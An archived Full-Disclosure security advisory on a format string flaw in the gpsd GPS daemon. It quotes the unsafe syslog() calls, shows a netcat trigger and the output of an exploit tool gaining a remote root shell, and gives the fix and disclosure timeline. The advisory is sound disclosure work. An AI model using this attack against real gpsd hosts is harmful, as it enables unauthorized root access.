Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email email@example.com
[Full-Disclosure] DMA[2005-0125a] - 'berlios gpsd format string vulnerability'
From: KF (Lists) (kf_listsdigitalmunition.com)
Date: Tue Jan 25 2005 - 23:08:16 CST
DMA[2005-0125a] - 'berlios gpsd (remake of pygps) format string vulnerability'
Author: Kevin Finisterre
Vendor: http://gpsd.berlios.de, http://www.pygps.org
gpsd is a service daemon that monitors a GPS attached to a host computer through
a serial or USB port. The GPS data from the device which includes location, course,
velocity is available to be queried on TCP port 2947. With gpsd, multiple GPS client
applications (such as navigational and wardriving software) can share access to a
GPS without contention or loss of data.
Who would use gpsd? GIS Projets, Remote Sensing Projects, Wardrivers (Kismet users),
Cartography Groups, Hydrology Projects, Land Management, Forrestry, etc.
Gpsd moved from www.pygps.org in August 2004 and gpsd has just undergone a major
rewrite at the hands of Eric S. Raymond, author of fetchmail and several books about
This bug appears to have been recently introduced into the codebase, possibly by
~esr? The vulnerability was introduced somewhere between gpsd-1.10.tar.gz 13-Oct-2003
and gpsd-1.90.tar.gz 19-Aug-2004. The last 2 names in the changelog are Derrick
J. Brashear, 2 January 2000 and Eric S. Raymond, 23 Aug 2004.
Vulnerable versions of gpsd can be found at:
Known vulnerable versions include gpsd-1.9.0 through gpsd-2.7.
The format string issue is in the gpsd_report() funciton. syslog() is used without a
format specifier multiple times in gpsd.c.
./gpsd.c: syslog(LOG_ERR, buf);
./gpsd.c: syslog(LOG_NOTICE, buf);
and more recently
./gpsd.c: syslog((errlevel == 0) ? LOG_ERR : LOG_NOTICE, buf);
There are very few gpsd_report() calls that contain "%s" and only one is an exploitable
./gpsd.c: gpsd_report(1, "<= client: %s", buf);
Here is a sample run at triggering the vulnerability.
[rootthreat gpsd-2.0]# /usr/sbin/gpsd -p /dev/ttyS0
[rootthreat gpsd-2.0]# tail -f /var/log/messages
Sep 19 12:59:23 threat gpsd: gpsd: launching (Version 2.0)
Sep 19 12:59:23 threat gpsd: gpsd: listening on port 2947
[rootthreat gpsd-2.0]# nc localhost 2947
The above netcat session generated the following Syslog messages.
Sep 19 13:00:08 threat gpsd: gpsd: closed GPS
Sep 19 13:00:08 threat gpsd: gpsd: opening GPS data source at /dev/ttyS0
Sep 19 13:00:08 threat gpsd: gpsd: setting speed 4800, 8 bits, no parity
Sep 19 13:00:08 threat gpsd: gpsd: gpsd_activate: opened GPS (6)
Sep 19 13:00:08 threat gpsd: gpsd: <= client:
Sep 19 13:00:11 threat gpsd: gpsd: closed GPS
>From here you are dealing with a classic format string exploit.
Successful exploitation on a redhat box gets you root, and on Debian you get
jdam:/home/kfinisterre/gps$ ./ex_gpsd -h 192.168.1.203 -t 12
# remote host 192.168.1.203.
Checking Remote version
GPSD VERSION: 2.6
# send exploit data.
[*] data sent 3389 bytes .
[*] data sent 2 bytes .
[+] Trying to exec shellcode on remote
[*] data sent 2 bytes .
[-] Waiting 5 seconds to connect to remote shell
[*] Executed shell successfully !
Linux localhost.localdomain 2.4.20-8 #1 Thu Mar 13 17:18:24 EST 2003 i686 athlon i386 GNU/Linux
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
stty: standard input: Invalid argument
[rootlocalhost /]# exit
To fix this vulnerability in ./gpsd.c you need to modify a few syslog calls. This
may break existing gpsd_report() functionality. When the author(s) gets around to
checking email and or reading the bug entries a new version will come out. This work
around is strictly to prevent exploitation.
syslog(LOG_ERR, "%s", buf);
syslog(LOG_NOTICE, "%s", buf);
syslog((errlevel == 0) ? LOG_ERR : LOG_NOTICE, "%s", buf);
Timeline associated with this bug:
01/19/2005 attempts to notify all of the individuals working on the project via email were made.
01/20/2005 BerliOS Developer bug ID #003087 Security Vulnerability ala syslog() was filed.
Full-Disclosure - We believe in it.
- text/x-csrc attachment: ex_gpsd.c